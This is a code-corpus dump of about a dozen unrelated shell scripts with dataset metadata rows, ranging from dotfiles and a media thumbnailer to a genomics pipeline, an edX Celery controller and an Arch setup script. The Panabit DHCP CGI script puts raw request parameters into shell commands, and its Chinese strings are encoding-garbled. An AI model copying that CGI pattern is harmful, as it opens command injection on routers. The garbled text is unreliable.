printf "CliFM: ffmpegthumbnailer: Command not found\n" >&2
exit $ERROR
fi
if [ -z "$1" ]; then
printf "CliFM: Missing argument\n" >&2
exit $ERROR
fi
# Hidden temp dir with a random 6-char alphanumeric suffix.
TMP_DIR=".vidthumbs.$(tr -dc A-Za-z0-9 </dev/urandom | head -c6)"
mkdir -- "$TMP_DIR" >&2
for arg in "$@"; do
if [ -d "$arg" ]; then
# Strip a single trailing slash so "$arg"/* globs cleanly.
if [ "$(printf "%s" "$arg" | tail -c1)" = '/' ]; then
# if [ ${arg: -1} = '/' ]; then
arg="${arg%?}"
fi
for file in "$arg"/*; do
if [ -f "$file" ]; then
ffmpegthumbnailer -i "$file" -o \
"$TMP_DIR/$(basename "$file").jpg" 2>/dev/null
fi
done
else
ffmpegthumbnailer -i "$arg" -o \
"$TMP_DIR/$(basename "$arg").jpg" 2>/dev/null
fi
done
# View the thumbnails with whichever viewer is installed.
if [ "$(which sxiv 2>/dev/null)" ]; then
sxiv -aqtr -- "$TMP_DIR"
elif [ "$(which feh 2>/dev/null)" ]; then
feh -tZk -- "$TMP_DIR"
elif [ "$(which lsix)" ]; then
lsix "$TMP_DIR"/*
else
printf "CliFM: No thumbails viewer found\n" >&2
rm -rf -- "$TMP_DIR" 2>/dev/null
exit $ERROR
fi
rm -rf -- "$TMP_DIR" 2>/dev/null
exit $SUCCESS
| true
|
cc08c4cbfc0d6918ff4ed4fba545a2af0a784eba
|
Shell
|
Snake4life/cambae
|
/clients/chaturbae/cb_client/bash_scripts/streamlink.sh
|
UTF-8
| 249
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Record a chaturbate stream with streamlink for ~3 seconds.
#   $1 - user name, $2 - datetime suffix for the output file
pid=0
USERNAME=$1
datetime=$2

# Stop the recorder if it is still running; also fires on script exit.
finish() {
  [ ${pid} -gt 0 ] && kill ${pid} 2>/dev/null
}
trap finish EXIT

# Record the worst-quality variant in the background, grab its PID,
# give it 3 seconds, then stop it.
streamlink -Q "http://www.chaturbate.com/${USERNAME}" worst -o "${USERNAME}-${datetime}.mkv" &
pid=$!
sleep 3
finish
| true
|
b9cf0f5d7d9ddfdd6f48d83ced4ef4365f6f37ad
|
Shell
|
sonata-nfv/tng-schema
|
/package-specification/test/test_5gtango-vnf-package-example.sh
|
UTF-8
| 619
| 3.109375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
##
## Test package examples against schemas,
## e.g., NAPD, NSDs, VNFDs, REFs, ...
## Aborts on the first validation failure (set -e).
set -e
CMD=yamlvalidate
BASE_DIR=$(dirname $0)

# Schema locations, relative to this test directory.
NAPD_SCHEMA=${BASE_DIR}/../napd-schema.yml
REF_SCHEMA=${BASE_DIR}/../ref-schema.yml
NSD_SCHEMA=${BASE_DIR}/../../service-descriptor/nsd-schema.yml
VNFD_SCHEMA=${BASE_DIR}/../../function-descriptor/vnfd-schema.yml

#
# Execute the tests: validate each example document against its schema.
#
EXAMPLE_PROJECT=${BASE_DIR}/../example-projects/5gtango-vnf-project-example
${CMD} -s ${VNFD_SCHEMA} -y ${EXAMPLE_PROJECT}/Definitions/myvnfd.yaml
${CMD} -s ${REF_SCHEMA} -y ${EXAMPLE_PROJECT}/Images/mycloudimage.ref
| true
|
fb14dfe77805bbeff766c434abd23e69f3b6d649
|
Shell
|
FichteFoll/dotfiles
|
/bin/bin/video-to-gif
|
UTF-8
| 767
| 3.203125
| 3
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/usr/bin/env zsh
# Convert a video to an animated GIF: extract frames with ffmpeg at the
# requested fps, then assemble an optimized GIF with ImageMagick.
# Usage: video-to-gif [--fps n] -i input -o output [extra ffmpeg args]
# parse args
_fps=(--fps 10)
zparseopts -D -E -K -fps:=_fps i:=_input o:=_output
fps=$_fps[2]
input=$_input[2]
output=$_output[2]
# Leftover args (after -D removal) are forwarded to ffmpeg.
params=($@)
if [[ -z $1 || $1 == --help || $1 == -h || -z "$input" || -z "$output" ]]; then
echo "params:"
echo " --fps n (optional)"
echo " -i input"
echo " -o output"
exit 1
fi
# calculate delay setting for convert
# -r x => 1/x
# -delay AxB => A/B
# delay=$(( 1000 / $fps ))
# echo "fps: $fps; delay: $delay"
# Frames are extracted to a temp dir, assembled, then cleaned up.
tmpdir=$(mktemp -d)
ffmpeg -i "$input" -r $fps $params "$tmpdir/out_%04d.png"
# convert $tmpdir/out_*.png -delay $delay -loop 0 -colors 32 -layers optimize "$output"
convert $tmpdir/out_*.png -colors 32 -delay 1x$fps -loop 0 -layers optimize "$output"
# gifsicle
rm -r $tmpdir
| true
|
92521b1852cc7acc36d80970bc271b822e3dd3fa
|
Shell
|
johnBgood/ansible
|
/ohmyzsh/roles/oh-my-zsh/files/bash_aliases
|
UTF-8
| 623
| 2.75
| 3
|
[] |
no_license
|
# Shell aliases (NOTE(review): 'alias -g' and the '*(-/DN)' glob are
# zsh-only features, matching the oh-my-zsh role this file belongs to).
alias lla='ls -al'
alias ll='ls -lh'
# Global aliases -- These do not have to be
# at the beginning of the command line.
alias -g M='|more'
alias -g H='|head'
alias -g T='|tail'
alias -g L='|less'
# List only directories and symbolic
# links that point to directories
alias lsd='ls -ld *(-/DN)'
# List only file beginning with "."
alias lsa='ls -ld .*'
# Package manager
# Debian/Ubuntu apt-get shortcuts.
alias install='sudo apt-get install'
alias search='apt-cache search'
alias show='apt-cache show'
alias remove='sudo apt-get remove'
alias purge='sudo apt-get purge'
alias update='sudo apt-get update'
alias dist-upgrade='sudo apt-get dist-upgrade'
| true
|
e3761a8b417f7054e33ba3e7652f19792d286bba
|
Shell
|
DerekStride/dotfiles
|
/zsh/prompt.zsh
|
UTF-8
| 772
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
# zsh prompt: arrow glyph + (user name when remote/root) + short cwd.
autoload colors && colors
# If the current path, with prefix replacement, has 3 or more elements `%3~`
# then return the directory we're in `%1/` else return the whole path `%2~`.
#
# The `~` in `%3~` means the current working directory but if it starts with
# $HOME, that part is replaced by a ‘~’. Changing it to `%3/` would not do the
# substitution, like we do with `%1/`.
directory_name() {
  echo "%{$fg_bold[blue]%}%(3~|%1/|%2~)%{$reset_color%} "
}

# Green arrow prompt glyph.
prompt_arrow() {
  echo "%{$fg_bold[green]%}➜%{$reset_color%} "
}

# Show the user name when inside an SSH session or running as root.
prompt_machine_info() {
  if [[ -n "${SSH_CONNECTION-}${SSH_CLIENT-}${SSH_TTY-}" ]] || (( EUID == 0 )); then
    echo "%{$fg_bold[magenta]%}%n%{$reset_color%} "
  fi
}

# $'…' keeps the $(…) substitutions literal so the functions are
# re-evaluated at every prompt (relies on promptsubst).
export PROMPT=$'$(prompt_arrow)$(prompt_machine_info)$(directory_name)'
| true
|
6818d82050f5bfe6b1459568bbf5cf853be86cd9
|
Shell
|
tleonardi/tapRNAs
|
/scripts/other_analysis/ctcf_coverage.sh
|
UTF-8
| 3,869
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
# CTCF analysis: download ENCODE TFBS clusters, lift CTCF sites to hg38,
# count promoter overlaps per transcript class, and build coverage
# heatmaps/profiles of CTCF around pcRNAs with deepTools.
set -xe -o pipefail
shopt -s extglob
# include.sh provides $BASEDIR plus tool paths ($LIFTOVER,
# $INTERSECT_BED, $BEDTOBAM, $SAMTOOLS, $BIN, ...).
source $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/../include.sh

PC=$BASEDIR/nc/posConNCwithCodingPartner.bedx
HIC=$BASEDIR/downstream/hic
DIR=$BASEDIR/downstream/ctcf

mkdir -p $DIR/data

# Download the ENCODE TFBS clusters only once (cached in data/).
if [[ ! -f $DIR/data/tfbs.bed ]]; then
	wget -O - http://hgdownload.cse.ucsc.edu/goldenPath/hg19/encodeDCC/wgEncodeRegTfbsClustered/wgEncodeRegTfbsClusteredWithCellsV3.bed.gz | gunzip > $DIR/data/tfbs.bed
fi

# Keep CTCF sites only, lift hg19 -> hg38, and sort.
awk '$4=="CTCF"' $DIR/data/tfbs.bed > $DIR/data/ctcf_hg19.bed
$LIFTOVER -bedPlus=5 $DIR/data/ctcf_hg19.bed $BASEDIR/data/hg19ToHg38.over.chain $DIR/data/ctcf.unsorted.bed $DIR/data/ctcf.unmapped
sort -k1,1 -k2,2n -k3,3n $DIR/data/ctcf.unsorted.bed > $DIR/data/ctcf.bed

#################################################################
# How many pcRNAs are associated with CTCF sites in their pomoter?
#################################################################
mkdir -p $DIR/CtcfOverlapPromoter
# For each transcript class, count transcripts whose +-2kb promoter
# overlaps at least one CTCF site (groupby collapses to one row each).
$INTERSECT_BED -wo -a $HIC/posConAnnot_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/pc_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $HIC/Gencode.v21.linc.spliced_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/lincs_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $HIC/coding_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/pcCoding_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $BASEDIR/coding/Gencode-current_hsa_coding_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/gencode_coding_with_ctcf_in_prom.txt

# Summary table: overlap counts vs totals for each class.
cat <<EOT >$DIR/CtcfOverlapPromoter/ctcf_contact_summary.txt
Category	WithLoop	Total
pcRNA	$(wc -l $DIR/CtcfOverlapPromoter/pc_with_ctcf_in_prom.txt | awk '{print $1}')	$(wc -l $HIC/posConAnnot_PROMOTER+-2000.bed | awk '{print $1}')
lincRNAs	$(wc -l $DIR/CtcfOverlapPromoter/lincs_with_ctcf_in_prom.txt | awk '{print $1}')	$(wc -l $HIC/Gencode.v21.linc.spliced_PROMOTER+-2000.bed | awk '{print $1}')
pcCoding	$(wc -l $DIR/CtcfOverlapPromoter/pcCoding_with_ctcf_in_prom.txt | awk '{print $1}')	$(wc -l $HIC/coding_PROMOTER+-2000.bed | awk '{print $1}')
GencodeCoding	$(wc -l $DIR/CtcfOverlapPromoter/gencode_coding_with_ctcf_in_prom.txt | awk '{print $1}')	$(wc -l $BASEDIR/coding/Gencode-current_hsa_coding_PROMOTER+-2000.bed | awk '{print $1}')
EOT

#################################################################
# ALL: Make heatmaps of CTCF overlap
#################################################################
# bamCoverage and computeMatrix are part of deepTools
mkdir -p $DIR/pcCoverageByCtcfAllLines
# Convert the loops to big wig
awk 'BEGIN{OFS=FS="\t"}{print $1,$2,$3,"CTCF_"NR}' $DIR/data/ctcf.bed > $DIR/data/ctcf.bed4
$BEDTOBAM -i $DIR/data/ctcf.bed4 -g $BASEDIR/data/hg38.chromSizes > $DIR/data/ctcf.bam.unsorted
# NOTE(review): "samtools sort in.bam out_prefix" is the legacy (<1.3)
# calling convention — confirm the pinned $SAMTOOLS version matches.
$SAMTOOLS sort $DIR/data/ctcf.bam.unsorted $DIR/data/ctcf
$SAMTOOLS index $DIR/data/ctcf.bam $DIR/data/ctcf.bam.bai
bamCoverage -b $DIR/data/ctcf.bam -o $DIR/data/ctcf.bw

# Compute matrices
mkdir -p $DIR/pcCoverageByCtcfAllLines/matrix/
computeMatrix scale-regions -b 20000 -a 20000 -m 10000 --regionsFileName $HIC/pcCoverageByLoops/annotationByPosition/posConAnnot.bed --sortRegions "no" --outFileNameMatrix $DIR/pcCoverageByCtcfAllLines/matrix/peaks_pc_matrix.txt --scoreFileName $DIR/data/ctcf.bw --missingDataAsZero --outFileName /dev/null -p 1
# Plot the average CTCF coverage profile and rasterize it to PNG.
Rscript $BIN/dtCompare.R --files $DIR/pcCoverageByCtcfAllLines/matrix/peaks_pc_matrix.txt --labels Ctcf --profileStdErr --noHeat --profW 10 --profH 10 --outFile $DIR/pcCoverageByCtcfAllLines/CTCF_coverage
convert -density 300 $DIR/pcCoverageByCtcfAllLines/CTCF_coverage_profile.pdf -quality 100 $DIR/pcCoverageByCtcfAllLines/CTCF_coverage_profile.png
| true
|
f66f70492d888f5f5f9457f925578d302139136e
|
Shell
|
christaotaoz/shkd-work
|
/work/panabit_plugin/pa_plugin/cfy/Route/src/dhcpsvr_leaselist
|
GB18030
| 5,152
| 3.078125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#This script is created by ssparser automatically. The parser first created by MaoShouyan
printf "Content-type: text/html;charset=gb2312
Cache-Control: no-cache
"
echo -n "";
. ../common/common.sh
myself="/cgi-bin/Route/`basename $0`"
[ "${CGI_id}" = "" ] && CGI_id=0
echo -n "
<script type=\"text/javascript\" src=\"/img/common.js\"></script>
<script language=\"javascript\">
function deleteLease(mac)
{
if (confirm(\"ȷҪɾ⻧?\"))
window.location.href = \"${myself}?action=delete&mac=\" + mac;
}
function addStatic(mac, ip, desc)
{
var args;
args=\"&mac=\" + mac + \"&ip=\" + ip;
if (desc != \"\")
args += \"&desc=\" + desc;
window.location.href = \"${myself}?action=addstatic\" + args;
}
function showIp(ipaddr)
{
var url = \"/cgi-bin/Monitor/ipview_data?ipaddr=\" + ipaddr;
ShowWindow(url, \"\", 650, 700);
}
function showServer(name)
{
var url = \"/cgi-bin/Monitor/proxy_show?proxyname=\" + name;
ShowWindow(url, \"\", 350, 380);
}
</script>
";
if [ "${CGI_action}" = "delete" ]; then
errmsg=`${FLOWEYE} dhcplease remove mac=${CGI_mac}`
if [ "$?" != "0" ]; then
afm_dialog_msg "ʧ:${errmsg}"
fi
elif [ "${CGI_action}" = "addstatic" ]; then
cmdargs="mac=${CGI_mac} ip=${CGI_ip}"
[ "${CGI_desc}" != "" ] && cmdargs="${cmdargs} desc=${CGI_desc}"
errmsg=`${FLOWEYE} dhcpsta add ${cmdargs}`
if [ "$?" != "0" ]; then
afm_dialog_msg "ʧ:${errmsg}"
fi
fi
echo -n "
<body>
"; cgi_show_title "DHCP->⻧Ϣ"
echo -n "
<br>
<table width=1000 border=0 cellspacing=1 cellpadding=1>
<form method=post action=\"${myself}\">
<tr id=tblhdr height=22>
<td width=* align=left>ѡ
<select name=id value=\"${CGI_id}\" style=\"width:105;height:21\">
";
if [ "${CGI_id}" = "0" ]; then
echo "<option value=0 selected>з</option>"
else
echo "<option value=0>з</option>"
fi
${FLOWEYE} nat listproxy type=routerif | while read type id name theothers
do
if [ "${id}" = "${CGI_id}" ]; then
echo "<option value=${id} selected>${name}</option>"
else
echo "<option value=${id}>${name}</option>"
fi
done
echo -n "
</select> <input type=text name=filter style=\"width:200\" value=\"${CGI_filter}\" />
<input type=submit value=\"ѯ\" style=\"width:70;height:20\"></input>
</td>
</tr>
</form>
</table>
<table width=1000 border=0 cellspacing=1 cellpadding=1>
<tr id=tblhdr height=22>
<td width=30 align=left></td>
<td width=70 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=server\">DHCP</a></td>
<td width=125 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=mac\">MACַ</a></td>
<td width=110 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=ip\">IPַ</a></td>
<td width=180 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=name\">û</a></td>
<td width=40 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=vlan\">VLAN</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=state\">״̬</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=type\"></a></td>
<td width=120 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=birth\">ʱ</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=ttl\">()</a></td>
<td width=* align=right> </td>
</tr>
";
case "${CGI_sort}" in
"server")
sortargs="-k2"
;;
"mac")
sortargs="-k3"
;;
"ip")
sortargs="-k4"
;;
"name")
sortargs="-k5"
;;
"vlan")
sortargs="-k6"
;;
"state")
sortargs="-k7"
;;
"type")
sortargs="-k8"
;;
"birth")
sortargs="-k9"
;;
"ttl")
sortargs="-k10"
;;
*)
sortargs="-k4"
;;
esac
cmdargs=""
[ "${CGI_id}" != "0" ] && cmdargs="${cmdargs} id=${CGI_id}"
idname="row1"
count=0
${FLOWEYE} dhcplease list ${cmdargs} | grep "${CGI_filter}" | sort ${sortargs} | \
while read lanif mac ip uip name vlan state type ltime ttl theothers
do
echo -n "
<tr id=${idname}>
<td align=left>${count} </td>
<td align=right><a style=\"color:#0000ff\" href=\"javascript:showServer('${lanif}')\">${lanif} </a></td>
<td align=right>${mac} </td>
<td align=right><a href=\"javascript:showIp('${ip}')\">${ip} </a></td>
"; [ "${name}" = "NULL" ] && name=""
echo -n "
<td align=right>${name} </td>
<td align=right>${vlan}</td>
<td align=right>${state}</td>
"; if [ "${type}" = "STATIC" ]; then
echo -n "
<td align=right>̬</td>
"; else
echo -n "
<td align=right>̬</td>
"; fi
echo -n "
<td align=right>${ltime}</td>
<td align=right>${ttl}</td>
<td align=right>
<a style=\"color:#0000ff\" href=\"javascript:deleteLease('${mac}')\">ɾ</a>
"; if [ "${type}" != "STATIC" ]; then
echo -n "
<a style=\"color:#0000ff\" href=\"javascript:addStatic('${mac}', '${ip}', '${name}')\">ת̬</a>
"; else
echo -n "
ת̬
"; fi
echo -n "
</td>
</tr>
"; if [ "${idname}" = "row1" ]; then
idname="row2"
else
idname="row1"
fi
count=$((${count} + 1))
done
echo -n "
</table>
</body>
</html>
";
| true
|
d91cb78db7ea38ea2cb8a6dcedb58c104fa531c3
|
Shell
|
woodstok/tmux-butler
|
/modes/butler-history
|
UTF-8
| 251
| 2.671875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Launch tmux-butler in "history" mode: candidates come from the
# deduplicated .history file and are picked via the fzf-based selector.

# Resolve the repository root (the parent of this script's directory).
ROOTDIR="$( cd "$(dirname "$0")/.." >/dev/null 2>&1 ; pwd -P )"

# Command tmux-butler runs to produce the candidate lines.
export READER="cat $ROOTDIR/.history | uniq"
# Get the buffername from the selection
export SELECTOR="$ROOTDIR/scripts/fzf-common --no-sort"

$ROOTDIR/tmux-butler
| true
|
d11e136b854247b76526c06a81c492e7ea5a947f
|
Shell
|
GbalsaC/edxRoot
|
/scripts/ctl.sh
|
UTF-8
| 3,477
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# edX Celery worker control: start/stop/status for the LMS/CMS queues.
# Usage: ctl.sh {start|stop|status}

# Queue names, one Celery worker per entry; WORKERS_CONCURRENCY holds the
# matching --concurrency value at the same index.
WORKERS=( "edx.lms.core.low" "edx.lms.core.default" "edx.lms.core.high" "edx.lms.core.high_mem" "edx.cms.core.low" "edx.cms.core.default" "edx.cms.core.high" )
WORKERS_CONCURRENCY=( "1" "3" "4" "2" "3" "4" "1" )

# Start one Celery worker for queue $1 with concurrency $2.
# When running as root (uid 0), drops privileges to the "daemon" user.
start_worker() {
   cd /opt/bitnami/apps/edx/edx-platform
   # `id | sed ...` extracts the numeric uid of the current user.
   if [ `id|sed -e s/uid=//g -e s/\(.*//g` -eq 0 ]; then
     su -s /bin/sh daemon -c "/opt/bitnami/apps/edx/edx-platform/bin/python.edxapp ./manage.py lms --settings=aws celery worker -I contentstore.tasks --loglevel=info --queues=$1 --hostname=$1.%h --concurrency=$2 > /opt/bitnami/apps/edx/edxapp/log/$1.log 2>&1 &"
   else
     /opt/bitnami/apps/edx/edx-platform/bin/python.edxapp ./manage.py lms --settings=aws celery worker -I contentstore.tasks --loglevel=info --queues=$1 --hostname=$1.%h --concurrency=$2 > /opt/bitnami/apps/edx/edxapp/log/$1.log 2>&1 &
   fi
   cd - > /dev/null
}
# Kill (SIGKILL) every worker process serving queue $1.
# NOTE(review): kill -9 gives workers no chance to finish in-flight tasks;
# consider SIGTERM first.
stop_worker() {
    ps axf | grep "/opt/bitnami/apps/edx/edx-platform/venv/bin/python" | grep "queues=$1" | grep -v grep | awk '{print "kill -9 " $1}' | sh
}
# Probe for a live Celery worker serving queue $1.
# Side effect: sets the global RUNNING (1 = worker found, 0 = none).
# Returns RUNNING as the exit status, i.e. NON-zero when a worker IS running.
is_celery_worker_running() {
  local matches
  matches=$(ps axf | grep "/opt/bitnami/apps/edx/edx-platform/venv/bin/python" | grep "queues=$1" | grep -v grep)
  case "$matches" in
    "") RUNNING=0 ;;
    *)  RUNNING=1 ;;
  esac
  return $RUNNING
}
# Classify the fleet state by counting live workers (each probe returns 1
# when its worker is running).  Sets RUNNING and EDX_STATUS; returns RUNNING:
#   0 = none/one running, 1 = all 7 running, 2 = partial (2..6).
# NOTE(review): exactly ONE running worker is reported as "not running"
# (the -gt "1" bound) -- confirm that is intended.
are_edx_workers_running() {
  WORKERS_RUNNING=0
  for WORKER in ${WORKERS[*]}; do
    is_celery_worker_running $WORKER
    let WORKERS_RUNNING=WORKERS_RUNNING+$?
  done
  RES="Number of running workers $WORKERS_RUNNING"
  if [ "$WORKERS_RUNNING" -gt "1" ] && [ "$WORKERS_RUNNING" -lt "7" ]; then
    RUNNING=2
    EDX_STATUS="Some edX Celery workers are running: $RES"
  elif [ "$WORKERS_RUNNING" == "7" ]; then
    RUNNING=1
    EDX_STATUS="edX Celery workers already running"
  else
    RUNNING=0
    EDX_STATUS="edX Celery workers not running"
  fi
  return $RUNNING
}
# Stop every worker; exits the script early when nothing is running.
# NOTE(review): ERROR=3 is set on failure but never used as an exit code.
stop_edx_workers() {
  are_edx_workers_running
  RUNNING=$?
  if [ $RUNNING -eq 0 ]; then
    echo "$0 $ARG: $EDX_STATUS"
    exit
  fi
  for WORKER in ${WORKERS[*]}; do
    stop_worker $WORKER
  done
  are_edx_workers_running
  ERROR=$?
  if [ $ERROR -eq 0 ]; then
    EDX_STATUS="edX workers stopped"
  else
    EDX_STATUS="edX workers could not be stopped: $RES"
    ERROR=3
  fi
}
# Start every worker that is not already running, then re-check after 3s.
start_edx_workers() {
  are_edx_workers_running
  RUNNING=$?
  if [ $RUNNING -eq 1 ]; then
    echo "$0 $ARG: edX workers already running"
    exit
  fi
  LIMIT=`expr ${#WORKERS[*]} - 1`
  for INDEX in `seq 0 $LIMIT`; do
    # is_celery_worker_running sets the global RUNNING used just below.
    is_celery_worker_running ${WORKERS[$INDEX]}
    if [[ $RUNNING -eq 0 ]]; then
      start_worker ${WORKERS[$INDEX]} ${WORKERS_CONCURRENCY[$INDEX]}
    fi
  done
  sleep 3
  are_edx_workers_running
  RUNNING=$?
  if [ $RUNNING -eq 1 ]; then
    EDX_STATUS="edX workers started"
  else
    EDX_STATUS="edX failed to start: $RES"
  fi
}
# Report status; while only SOME workers run (state 2), retry recovery up to
# 5 times by starting the missing ones.
status_edx_workers() {
  CONT=0
  STATUS=2
  while [[ $CONT -lt 5 && $STATUS -eq 2 ]]; do
    are_edx_workers_running
    STATUS=$?
    if [[ $STATUS -eq 2 ]]; then
      #some runners are not running, trying to recover them
      start_edx_workers
    fi
    let CONT=CONT+1
    sleep 2
  done
}
# Dispatch on the first CLI argument; an unknown or missing argument falls
# through and only the (then-empty) status line is printed.
case "x$1" in
  xstart)  start_edx_workers ;;
  xstop)   stop_edx_workers ;;
  xstatus) status_edx_workers ;;
esac
echo "$EDX_STATUS"
| true
|
28c075b1c9140bdd7aea7ad43619a7645e01a55d
|
Shell
|
vfbsilva/docker
|
/theano/run.sh
|
UTF-8
| 382
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the theanogru-gpu container, choosing the in-container command from $1:
#   train   -> ./train.sh
#   process -> ./process.sh
#   (other) -> interactive bash
IMAGE=theanogru-gpu

case "$1" in
    train)   CMD=./train.sh ;;
    process) CMD=./process.sh ;;
    *)       CMD=bash ;;
esac

# execute docker run with nvidia driver and device
docker run -it --device=/dev/nvidiactl --device=/dev/nvidia-uvm --device=/dev/nvidia0 --volume-driver nvidia-docker -v nvidia_driver_367.57:/usr/local/nvidia:ro $IMAGE $CMD
| true
|
a449e559ba11b08189e7735dcc3c93b21b3052cc
|
Shell
|
vishalsacharya/stokes
|
/scripts/3stampede.job
|
UTF-8
| 1,896
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# SLURM batch job for the TBSLAS stokes solver on Stampede (TACC).
#SBATCH -J TBSLAS
#SBATCH --export=ALL
#SBATCH -n 64              # total number of mpi tasks requested
#SBATCH -N 64              # nodes
#SBATCH -p normal          # queue (partition) -- normal, development, etc.
#SBATCH -t 02:00:00        # run time (hh:mm:ss) - 1.5 hours
#SBATCH --mail-user=arash@ices.utexas.edu
#SBATCH --mail-type=begin  # email me when the job starts
#SBATCH --mail-type=end    # email me when the job finishes
WORK_DIR=${PWD}
cd ${WORK_DIR}
# Parameter sweep kept for reference (scaling study over node counts):
# odes+=(          1      9     47     227     1024 );
# cores+=(        16     16     16      16       16 );
# mpi_proc+=(      1      9     47     227     1024 );
# threads+=(      16     16     16      16       16 );
# test_case+=(     3      3      3       3        3 );
# pt_cnt+=(     1000   1000   1000    1000     1000 );
# pt_rad+=(     0.10   0.10   0.10    0.10     0.10 );
# jump_width+=( 1e-9   1e-9   1e-9    1e-9     1e-9 );
# rho+=(        1e+9   1e+9   1e+9    1e+9     1e+9 );
# ref_tol+=(    1e-9   1e-9   1e-9    1e-9     1e-9 );
# min_depth+=(     1      1      1       1        1 );
# max_depth+=(     5      6      7       8        9 );
# fmm_q+=(        14     14     14      14       14 );
# fmm_m+=(        10     10     10      10       10 );
# gmres_tol+=(  1e-8   1e-8   1e-8    1e-8     1e-8 );
# gmres_iter+=(  200    200    200     200      200 );
# max_time+=( 360000 360000 360000  360000   360000 );
module load fftw3
export OMP_NUM_THREADS=16
export TBSLAS_RESULT_DIR=${WORK}/stokes_tc_3
mkdir -p ${TBSLAS_RESULT_DIR};
# NOTE: the trailing backslashes splice option names across lines
# (-j\ + ump_width => -jump_width, -gmres\ + _tol => -gmres_tol).
time ibrun tacc_affinity bin/stokes -test_case 3 -pt_cnt 1000 -pt_rad 0.10 -j\
ump_width 1e-9 -rho 4.0e+9 -ref_tol 1e-9 -min_depth 1 -max_depth 5 -fmm_q 14 -fmm_m 10 -gmres\
_tol 1e-8 -gmres_iter 200 -tn 1
### End of script
| true
|
834df846249027e341fdb691d8ec034eb220417b
|
Shell
|
raghavnauhria/whatmt
|
/pytorch/.jenkins/pytorch/macos-build-test.sh
|
UTF-8
| 298
| 2.84375
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
#!/bin/bash
# Run the macOS build and/or test phase.  With BUILD_ENVIRONMENT unset both
# phases run; otherwise a phase runs only when the name contains
# "-build" / "-test" respectively.

here="$(dirname "${BASH_SOURCE[0]}")"

if [[ -z "${BUILD_ENVIRONMENT}" || "${BUILD_ENVIRONMENT}" == *-build* ]]; then
  source "$here/macos-build.sh"
fi

if [[ -z "${BUILD_ENVIRONMENT}" || "${BUILD_ENVIRONMENT}" == *-test* ]]; then
  source "$here/macos-test.sh"
fi
| true
|
72eff12506203d4501fd8a0b5c6f878a967338d6
|
Shell
|
techno-tanoC/shell
|
/arch.sh
|
UTF-8
| 2,018
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/sh
# Manjaro/Arch post-install provisioning: base CLI tools, desktop apps,
# Japanese input (fcitx/mozc) and docker.  Run as a user with sudo rights.
set -eu
# Base CLI tooling from the official repos plus a few AUR packages via yay.
setup_base() {
  sudo pacman-mirrors -c Japan
  sudo pacman -Syyu
  sudo pacman -S --noconfirm yay
  sudo pacman -S --noconfirm tree
  sudo pacman -S --noconfirm vim
  # binutils installs the strip command
  sudo pacman -S --noconfirm base-devel
  sudo pacman -S --noconfirm zsh
  sudo pacman -S --noconfirm fd
  sudo pacman -S --noconfirm ripgrep
  sudo pacman -S --noconfirm dnsutils
  yay -S --noconfirm peco
  yay -S --noconfirm ngrok-bin
  yay -S --noconfirm direnv-bin
}
# Desktop applications, fonts, and removal of unneeded demos.
setup_app() {
  # If VM backgrounds become transparent, Kvantum may be the cause.
  sudo pacman -S --noconfirm virtualbox linux510-virtualbox-host-modules linux510-virtualbox-guest-modules
  sudo pacman -S --noconfirm transmission-gtk
  sudo pacman -S --noconfirm spacefm
  sudo pacman -S --noconfirm gnome-control-center
  yay -S --noconfirm gnome-session-properties
  sudo pacman -S --noconfirm gnome-tweaks
  sudo pacman -S --noconfirm eog
  sudo pacman -S --noconfirm vlc
  # yay -S --noconfirm google-chrome
  yay -S --noconfirm patch slack-desktop
  yay -S --noconfirm visual-studio-code-bin
  yay -S --noconfirm bitwarden-bin
  yay -S --noconfirm xsel
  yay -S --noconfirm insomnia-bin
  # install font
  sudo pacman -S --noconfirm otf-ipaexfont
  sudo pacman -S --noconfirm noto-fonts-emoji
  fc-cache -vf
  # uninstall terrain
  sudo pacman -R --noconfirm mesa-demos lib32-mesa-demos
}
# Japanese input method; appends fcitx env vars to /etc/environment.
# NOTE(review): re-running appends duplicate lines to /etc/environment.
setup_fcitx() {
  sudo pacman -S --refresh --noconfirm fcitx-im fcitx-configtool fcitx-mozc
  echo '''
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS=@im=fcitx

# to autostart
# fcitx-autostart &

# to remap capslock to ctrl
# setxkbmap -option ctrl:nocaps
''' | sudo tee -a /etc/environment
}
# Docker engine + compose; adds current user to the docker group.
setup_docker() {
  sudo pacman -S --refresh --noconfirm docker docker-compose docker-machine
